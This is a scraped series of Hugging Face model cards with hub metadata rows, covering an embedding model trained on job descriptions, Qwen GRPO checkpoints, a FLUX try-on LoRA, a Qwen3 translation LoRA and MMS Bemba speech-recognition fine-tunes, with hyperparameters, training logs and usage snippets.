| <code>The Network Development Technician implements gas transmission and/or distribution network development projects and monitors site activities. He/She supports the preparation of construction activity records, project progress reports and materials required for payments. He also liaises with contractors and customers to carry out metering works and performs the installation, testing and commissioning of residential meters. He applies Safe System of Work (SSoW) procedures and risk control measures to ensure work activities are carried out safely, and in compliance with Workplace Safety and Health (WSH) Act. He is a member of the Emergency Response Team and follows emergency response plans and relevant safety procedures. He occasionally works at construction sites for the gas transmission and/or distribution network development projects. He is a good team player who collaborates and communicates effectively with key stakeholders. He is detailed in ensuring that operations are carried out a...</code> | <code>The Network Development Technician is responsible for executing gas transmission and distribution network expansion initiatives while overseeing on-site operations. This role involves assisting in the documentation of construction activities, compiling project status updates, and coordinating materials for billing purposes. The technician interacts with contractors and clients to facilitate metering installations, including the testing and commissioning of residential gas meters. Adherence to Safe System of Work protocols and risk mitigation strategies is essential to maintain compliance with the Workplace Safety and Health Act. As an integral member of the Emergency Response Team, the technician follows prescribed emergency procedures and safety guidelines. Fieldwork at construction locations is periodically required. Strong teamwork, clear communication with stakeholders, and meticulous attention to procedural compliance are key attributes for success in this role.</code> | <code>The Network Operations Coordinator oversees the scheduling and administration of telecommunications network services, ensuring seamless connectivity and customer satisfaction. This position requires coordinating with service providers and vendors to manage infrastructure upgrades and maintenance tasks. The coordinator prepares operational reports and assists with billing reconciliations. Familiarity with IT systems and network management software is essential, alongside strong communication skills to liaise with internal teams and external partners. While safety protocols are observed, the role primarily focuses on service delivery rather than physical installation or emergency response activities. The coordinator works mainly in an office environment and supports multiple projects simultaneously without direct involvement in gas transmission or distribution networks.</code> |
* Loss: [<code>MultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#multiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim",
"gather_across_devices": false
}
```
### Training Hyperparameters
#### Non-Default Hyperparameters
- `eval_strategy`: epoch
- `per_device_train_batch_size`: 16
- `per_device_eval_batch_size`: 32
- `gradient_accumulation_steps`: 32
- `learning_rate`: 2e-05
- `weight_decay`: 0.01
- `num_train_epochs`: 5
- `lr_scheduler_type`: cosine
- `warmup_ratio`: 0.1
- `bf16`: True
- `tf32`: True
- `load_best_model_at_end`: True
- `gradient_checkpointing`: True
- `batch_sampler`: no_duplicates
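As a hedged sketch, these non-default values map onto `SentenceTransformerTrainingArguments` roughly as follows; the output directory is a placeholder, and `save_strategy="epoch"` is an assumption (not listed above) so that `load_best_model_at_end` can select the best checkpoint:
```python
from sentence_transformers import SentenceTransformerTrainingArguments
from sentence_transformers.training_args import BatchSamplers

args = SentenceTransformerTrainingArguments(
    output_dir="output/ssf-retriever",  # placeholder path
    eval_strategy="epoch",
    save_strategy="epoch",  # assumed, to match eval_strategy
    per_device_train_batch_size=16,
    per_device_eval_batch_size=32,
    gradient_accumulation_steps=32,
    learning_rate=2e-5,
    weight_decay=0.01,
    num_train_epochs=5,
    lr_scheduler_type="cosine",
    warmup_ratio=0.1,
    bf16=True,
    tf32=True,
    load_best_model_at_end=True,
    gradient_checkpointing=True,
    batch_sampler=BatchSamplers.NO_DUPLICATES,
)
```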
#### All Hyperparameters
<details><summary>Click to expand</summary>
- `overwrite_output_dir`: False
- `do_predict`: False
- `eval_strategy`: epoch
- `prediction_loss_only`: True
- `per_device_train_batch_size`: 16
- `per_device_eval_batch_size`: 32
- `per_gpu_train_batch_size`: None
- `per_gpu_eval_batch_size`: None
- `gradient_accumulation_steps`: 32
- `eval_accumulation_steps`: None
- `torch_empty_cache_steps`: None
- `learning_rate`: 2e-05
- `weight_decay`: 0.01
- `adam_beta1`: 0.9
- `adam_beta2`: 0.999
- `adam_epsilon`: 1e-08
- `max_grad_norm`: 1.0
- `num_train_epochs`: 5
- `max_steps`: -1
- `lr_scheduler_type`: cosine
- `lr_scheduler_kwargs`: {}
- `warmup_ratio`: 0.1
- `warmup_steps`: 0
- `log_level`: passive
- `log_level_replica`: warning
- `log_on_each_node`: True
- `logging_nan_inf_filter`: True
- `save_safetensors`: True
- `save_on_each_node`: False
- `save_only_model`: False
- `restore_callback_states_from_checkpoint`: False
- `no_cuda`: False
- `use_cpu`: False
- `use_mps_device`: False
- `seed`: 42
- `data_seed`: None
- `jit_mode_eval`: False
- `use_ipex`: False
- `bf16`: True
- `fp16`: False
- `fp16_opt_level`: O1
- `half_precision_backend`: auto
- `bf16_full_eval`: False
- `fp16_full_eval`: False
- `tf32`: True
- `local_rank`: 0
- `ddp_backend`: None
- `tpu_num_cores`: None
- `tpu_metrics_debug`: False
- `debug`: []
- `dataloader_drop_last`: False
- `dataloader_num_workers`: 0
- `dataloader_prefetch_factor`: None
- `past_index`: -1
- `disable_tqdm`: False
- `remove_unused_columns`: True
- `label_names`: None
- `load_best_model_at_end`: True
- `ignore_data_skip`: False
- `fsdp`: []
- `fsdp_min_num_params`: 0
- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- `fsdp_transformer_layer_cls_to_wrap`: None
- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- `deepspeed`: None
- `label_smoothing_factor`: 0.0
- `optim`: adamw_torch_fused
- `optim_args`: None
- `adafactor`: False
- `group_by_length`: False
- `length_column_name`: length
- `ddp_find_unused_parameters`: None
- `ddp_bucket_cap_mb`: None
- `ddp_broadcast_buffers`: False
- `dataloader_pin_memory`: True
- `dataloader_persistent_workers`: False
- `skip_memory_metrics`: True
- `use_legacy_prediction_loop`: False
- `push_to_hub`: False
- `resume_from_checkpoint`: None
- `hub_model_id`: None
- `hub_strategy`: every_save
- `hub_private_repo`: None
- `hub_always_push`: False
- `hub_revision`: None
- `gradient_checkpointing`: True
- `gradient_checkpointing_kwargs`: None
- `include_inputs_for_metrics`: False
- `include_for_metrics`: []
- `eval_do_concat_batches`: True
- `fp16_backend`: auto
- `push_to_hub_model_id`: None
- `push_to_hub_organization`: None
- `mp_parameters`:
- `auto_find_batch_size`: False
- `full_determinism`: False
- `torchdynamo`: None
- `ray_scope`: last
- `ddp_timeout`: 1800
- `torch_compile`: False
- `torch_compile_backend`: None
- `torch_compile_mode`: None
- `include_tokens_per_second`: False
- `include_num_input_tokens_seen`: False
- `neftune_noise_alpha`: None
- `optim_target_modules`: None
- `batch_eval_metrics`: False
- `eval_on_start`: False
- `use_liger_kernel`: False
- `liger_kernel_config`: None
- `eval_use_gather_object`: False
- `average_tokens_across_devices`: False
- `prompts`: None
- `batch_sampler`: no_duplicates
- `multi_dataset_batch_sampler`: proportional
- `router_mapping`: {}
- `learning_rate_mapping`: {}
</details>
### Training Logs
| Epoch | Step | Training Loss | Validation Loss |
|:-------:|:------:|:-------------:|:---------------:|
| 0.3390 | 5 | 0.163 | - |
| 0.6780 | 10 | 0.0257 | - |
| 1.0 | 15 | 0.0048 | 0.0057 |
| 1.3390 | 20 | 0.0031 | - |
| 1.6780 | 25 | 0.0021 | - |
| 2.0 | 30 | 0.0015 | 0.0027 |
| 2.3390 | 35 | 0.0021 | - |
| 2.6780 | 40 | 0.0023 | - |
| 3.0 | 45 | 0.001 | 0.0017 |
| 3.3390 | 50 | 0.0013 | - |
| 3.6780 | 55 | 0.0014 | - |
| 4.0 | 60 | 0.0013 | 0.0015 |
| 4.3390 | 65 | 0.0013 | - |
| 4.6780 | 70 | 0.001 | - |
| **5.0** | **75** | **0.0018** | **0.0015** |
* The bold row denotes the saved checkpoint.
### Framework Versions
- Python: 3.12.8
- Sentence Transformers: 5.1.0
- Transformers: 4.55.0
- PyTorch: 2.8.0+cu128
- Accelerate: 1.10.0
- Datasets: 4.0.0
- Tokenizers: 0.21.4
## Citation
### BibTeX
#### Sentence Transformers
```bibtex
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
```
#### MultipleNegativesRankingLoss
```bibtex
@misc{henderson2017efficient,
title={Efficient Natural Language Response Suggestion for Smart Reply},
author={Matthew Henderson and Rami Al-Rfou and Brian Strope and Yun-hsuan Sung and Laszlo Lukacs and Ruiqi Guo and Sanjiv Kumar and Balint Miklos and Ray Kurzweil},
year={2017},
eprint={1705.00652},
archivePrefix={arXiv},
primaryClass={cs.CL}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
-->
|
alesiaivanova/Qwen-3b-GRPO-dag-5-sub-v5
|
alesiaivanova
| 2025-09-23T15:10:36Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"grpo",
"trl",
"arxiv:2402.03300",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:09:09Z |
---
library_name: transformers
model_name: Qwen-3b-GRPO-dag-5-sub-v5
tags:
- generated_from_trainer
- grpo
- trl
licence: license
---
# Model Card for Qwen-3b-GRPO-dag-5-sub-v5
This model is a fine-tuned version of [None](https://huggingface.co/None).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="None", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/alesyaivanova/long-horizon-reasoning/runs/bp0vfpld)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
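For orientation, a minimal GRPO training sketch with TRL; the actual base model, dataset, and reward function behind this checkpoint are not documented in this card, so every name below is illustrative:
```python
from datasets import Dataset
from trl import GRPOConfig, GRPOTrainer

# Toy reward: prefer completions close to 100 characters.
def reward_len(completions, **kwargs):
    return [-abs(100 - len(c)) for c in completions]

# Illustrative single-prompt dataset; GRPO samples several completions per prompt.
dataset = Dataset.from_dict({"prompt": ["Summarize: the sky is blue."]})

trainer = GRPOTrainer(
    model="Qwen/Qwen2.5-3B-Instruct",  # placeholder base model
    reward_funcs=reward_len,
    args=GRPOConfig(output_dir="grpo-out", num_generations=4),
    train_dataset=dataset,
)
trainer.train()
```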
### Framework versions
- TRL: 0.21.0
- Transformers: 4.55.3
- Pytorch: 2.7.1
- Datasets: 3.6.0
- Tokenizers: 0.21.4
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
Nohobby/SDXL_merges
|
Nohobby
| 2025-09-23T15:09:22Z | 0 | 0 | null |
[
"region:us"
] | null | 2025-05-16T16:08:13Z |
https://civitai.com/models/1665706?modelVersionId=1885360
|
alesiaivanova/Qwen-3b-GRPO-dag-5-sub-v4
|
alesiaivanova
| 2025-09-23T15:09:06Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"grpo",
"trl",
"arxiv:2402.03300",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:07:40Z |
---
library_name: transformers
model_name: Qwen-3b-GRPO-dag-5-sub-v4
tags:
- generated_from_trainer
- grpo
- trl
licence: license
---
# Model Card for Qwen-3b-GRPO-dag-5-sub-v4
This model is a fine-tuned version of [None](https://huggingface.co/None).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="None", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/alesyaivanova/long-horizon-reasoning/runs/q7737w4e)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.21.0
- Transformers: 4.55.3
- Pytorch: 2.7.1
- Datasets: 3.6.0
- Tokenizers: 0.21.4
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
amitkp621/AR-3-lora
|
amitkp621
| 2025-09-23T15:08:46Z | 0 | 0 |
diffusers
|
[
"diffusers",
"image-to-image",
"flux",
"lora",
"template:sd-lora",
"ai-toolkit",
"base_model:black-forest-labs/FLUX.1-Kontext-dev",
"base_model:adapter:black-forest-labs/FLUX.1-Kontext-dev",
"license:creativeml-openrail-m",
"region:us"
] |
image-to-image
| 2025-09-23T15:08:40Z |
---
tags:
- image-to-image
- flux
- lora
- diffusers
- template:sd-lora
- ai-toolkit
base_model: black-forest-labs/FLUX.1-Kontext-dev
license: creativeml-openrail-m
inference:
parameters:
width: 768
height: 1024
instance_prompt: tryon
---
# AR-3-lora
Model trained with [AI Toolkit by Ostris](https://github.com/ostris/ai-toolkit)
## Trigger words
You should use `tryon` to trigger the image generation.
## Download model and use it with ComfyUI, AUTOMATIC1111, SD.Next, Invoke AI, etc.
Weights for this model are available in Safetensors format.
[Download](https://huggingface.co/amitkp621/AR-3-lora/tree/main) them in the Files & versions tab.
## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers)
```py
from diffusers import AutoPipelineForText2Image
import torch
pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-Kontext-dev', torch_dtype=torch.bfloat16).to('cuda')
pipeline.load_lora_weights('amitkp621/AR-3-lora', weight_name='AR-3_000000250.safetensors')
image = pipeline('tryon').images[0]
image.save("my_image.png")
```
For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters)
|
Youseff1987/qwen-3-4b-instruct-2507-translate-2509-lora
|
Youseff1987
| 2025-09-23T15:08:18Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"qwen3",
"trl",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:08:04Z |
---
base_model: unsloth/qwen3-4b-instruct-2507-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- qwen3
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** Youseff1987
- **License:** apache-2.0
- **Finetuned from model :** unsloth/qwen3-4b-instruct-2507-bnb-4bit
This qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
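A minimal loading sketch with Unsloth (the sequence length and 4-bit flag are illustrative choices, not documented settings):
```python
from unsloth import FastLanguageModel

model, tokenizer = FastLanguageModel.from_pretrained(
    model_name="Youseff1987/qwen-3-4b-instruct-2507-translate-2509-lora",
    max_seq_length=2048,   # illustrative
    load_in_4bit=True,     # illustrative
)
FastLanguageModel.for_inference(model)  # enable Unsloth's faster inference mode
```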
|
csikasote/mms-1b-all-bemgen-combined-m25f100-52-DAT-0.9
|
csikasote
| 2025-09-23T15:08:01Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"wav2vec2",
"automatic-speech-recognition",
"bemgen",
"mms",
"generated_from_trainer",
"base_model:facebook/mms-1b-all",
"base_model:finetune:facebook/mms-1b-all",
"license:cc-by-nc-4.0",
"endpoints_compatible",
"region:us"
] |
automatic-speech-recognition
| 2025-09-23T14:10:40Z |
---
library_name: transformers
license: cc-by-nc-4.0
base_model: facebook/mms-1b-all
tags:
- automatic-speech-recognition
- bemgen
- mms
- generated_from_trainer
model-index:
- name: mms-1b-all-bemgen-combined-m25f100-52-DAT-0.9
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# mms-1b-all-bemgen-combined-m25f100-52-DAT-0.9
This model is a fine-tuned version of [facebook/mms-1b-all](https://huggingface.co/facebook/mms-1b-all) on the BEMGEN - BEM dataset.
It achieves the following results on the evaluation set:
- Loss: 0.2762
- Cer: 0.0799
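Pending fuller documentation, a minimal transcription sketch (the audio path is a placeholder):
```python
from transformers import pipeline

asr = pipeline(
    "automatic-speech-recognition",
    model="csikasote/mms-1b-all-bemgen-combined-m25f100-52-DAT-0.9",
)
print(asr("sample.wav")["text"])  # "sample.wav" is a placeholder path
```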
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0003
- train_batch_size: 8
- eval_batch_size: 4
- seed: 52
- gradient_accumulation_steps: 2
- total_train_batch_size: 16
- optimizer: AdamW (torch) with betas=(0.9, 0.999), epsilon=1e-08, and no additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 100
- num_epochs: 30.0
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss | Cer |
|:-------------:|:-------:|:----:|:---------------:|:------:|
| 7.5096 | 0.6711 | 100 | 2.8165 | 0.9938 |
| 2.4125 | 1.3423 | 200 | 0.4848 | 0.1492 |
| 1.4033 | 2.0134 | 300 | 0.3584 | 0.1053 |
| 1.2952 | 2.6846 | 400 | 0.3348 | 0.0977 |
| 1.2179 | 3.3557 | 500 | 0.3055 | 0.0878 |
| 1.1866 | 4.0268 | 600 | 0.2916 | 0.0830 |
| 1.1662 | 4.6980 | 700 | 0.2906 | 0.0856 |
| 1.1626 | 5.3691 | 800 | 0.2853 | 0.0818 |
| 1.2508 | 6.0403 | 900 | 0.2824 | 0.0805 |
| 1.2534 | 6.7114 | 1000 | 0.2814 | 0.0801 |
| 1.2901 | 7.3826 | 1100 | 0.2807 | 0.0798 |
| 1.2177 | 8.0537 | 1200 | 0.2762 | 0.0800 |
| 1.13 | 8.7248 | 1300 | 0.2736 | 0.0788 |
| 1.2379 | 9.3960 | 1400 | 0.2718 | 0.0777 |
| 1.0842 | 10.0671 | 1500 | 0.2699 | 0.0765 |
| 1.1996 | 10.7383 | 1600 | 0.2703 | 0.0759 |
| 1.17 | 11.4094 | 1700 | 0.2676 | 0.0746 |
| 1.1867 | 12.0805 | 1800 | 0.2664 | 0.0747 |
| 1.1887 | 12.7517 | 1900 | 0.2692 | 0.0768 |
| 1.1212 | 13.4228 | 2000 | 0.2664 | 0.0755 |
| 1.0755 | 14.0940 | 2100 | 0.2696 | 0.0755 |
### Framework versions
- Transformers 4.53.0.dev0
- Pytorch 2.6.0+cu124
- Datasets 3.6.0
- Tokenizers 0.21.0
|
tomal66/qwen2.5-1.5b-sarcasm-fpt-sft
|
tomal66
| 2025-09-23T15:07:50Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:07:39Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
alesiaivanova/Qwen-3b-GRPO-dag-5-sub-v3
|
alesiaivanova
| 2025-09-23T15:07:38Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"trl",
"grpo",
"arxiv:2402.03300",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:06:14Z |
---
library_name: transformers
model_name: Qwen-3b-GRPO-dag-5-sub-v3
tags:
- generated_from_trainer
- trl
- grpo
licence: license
---
# Model Card for Qwen-3b-GRPO-dag-5-sub-v3
This model is a fine-tuned version of [None](https://huggingface.co/None).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="None", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/alesyaivanova/long-horizon-reasoning/runs/pybdpuf3)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.21.0
- Transformers: 4.55.3
- Pytorch: 2.7.1
- Datasets: 3.6.0
- Tokenizers: 0.21.4
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
csikasote/mms-1b-all-bemgen-combined-m25f100-52-DAT-0.8
|
csikasote
| 2025-09-23T15:06:49Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"wav2vec2",
"automatic-speech-recognition",
"bemgen",
"mms",
"generated_from_trainer",
"base_model:facebook/mms-1b-all",
"base_model:finetune:facebook/mms-1b-all",
"license:cc-by-nc-4.0",
"endpoints_compatible",
"region:us"
] |
automatic-speech-recognition
| 2025-09-23T14:04:49Z |
---
library_name: transformers
license: cc-by-nc-4.0
base_model: facebook/mms-1b-all
tags:
- automatic-speech-recognition
- bemgen
- mms
- generated_from_trainer
model-index:
- name: mms-1b-all-bemgen-combined-m25f100-52-DAT-0.8
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# mms-1b-all-bemgen-combined-m25f100-52-DAT-0.8
This model is a fine-tuned version of [facebook/mms-1b-all](https://huggingface.co/facebook/mms-1b-all) on the BEMGEN - BEM dataset.
It achieves the following results on the evaluation set:
- Loss: 0.2647
- Cer: 0.0749
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0003
- train_batch_size: 8
- eval_batch_size: 4
- seed: 52
- gradient_accumulation_steps: 2
- total_train_batch_size: 16
- optimizer: AdamW (torch) with betas=(0.9, 0.999), epsilon=1e-08, and no additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 100
- num_epochs: 30.0
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss | Cer |
|:-------------:|:-------:|:----:|:---------------:|:------:|
| 7.4713 | 0.6711 | 100 | 2.8159 | 0.9936 |
| 2.3838 | 1.3423 | 200 | 0.4800 | 0.1481 |
| 1.3854 | 2.0134 | 300 | 0.3520 | 0.1025 |
| 1.2711 | 2.6846 | 400 | 0.3291 | 0.0958 |
| 1.2033 | 3.3557 | 500 | 0.3053 | 0.0880 |
| 1.1614 | 4.0268 | 600 | 0.2895 | 0.0823 |
| 1.1279 | 4.6980 | 700 | 0.2898 | 0.0849 |
| 1.1116 | 5.3691 | 800 | 0.2781 | 0.0793 |
| 1.1895 | 6.0403 | 900 | 0.2771 | 0.0789 |
| 1.2331 | 6.7114 | 1000 | 0.2709 | 0.0761 |
| 1.2487 | 7.3826 | 1100 | 0.2706 | 0.0762 |
| 1.1348 | 8.0537 | 1200 | 0.2673 | 0.0765 |
| 1.092 | 8.7248 | 1300 | 0.2676 | 0.0760 |
| 1.2101 | 9.3960 | 1400 | 0.2669 | 0.0755 |
| 1.0461 | 10.0671 | 1500 | 0.2682 | 0.0761 |
| 1.1471 | 10.7383 | 1600 | 0.2686 | 0.0749 |
| 1.1155 | 11.4094 | 1700 | 0.2662 | 0.0743 |
| 1.1397 | 12.0805 | 1800 | 0.2681 | 0.0755 |
| 1.1501 | 12.7517 | 1900 | 0.2655 | 0.0749 |
| 1.0764 | 13.4228 | 2000 | 0.2646 | 0.0749 |
| 1.0326 | 14.0940 | 2100 | 0.2671 | 0.0746 |
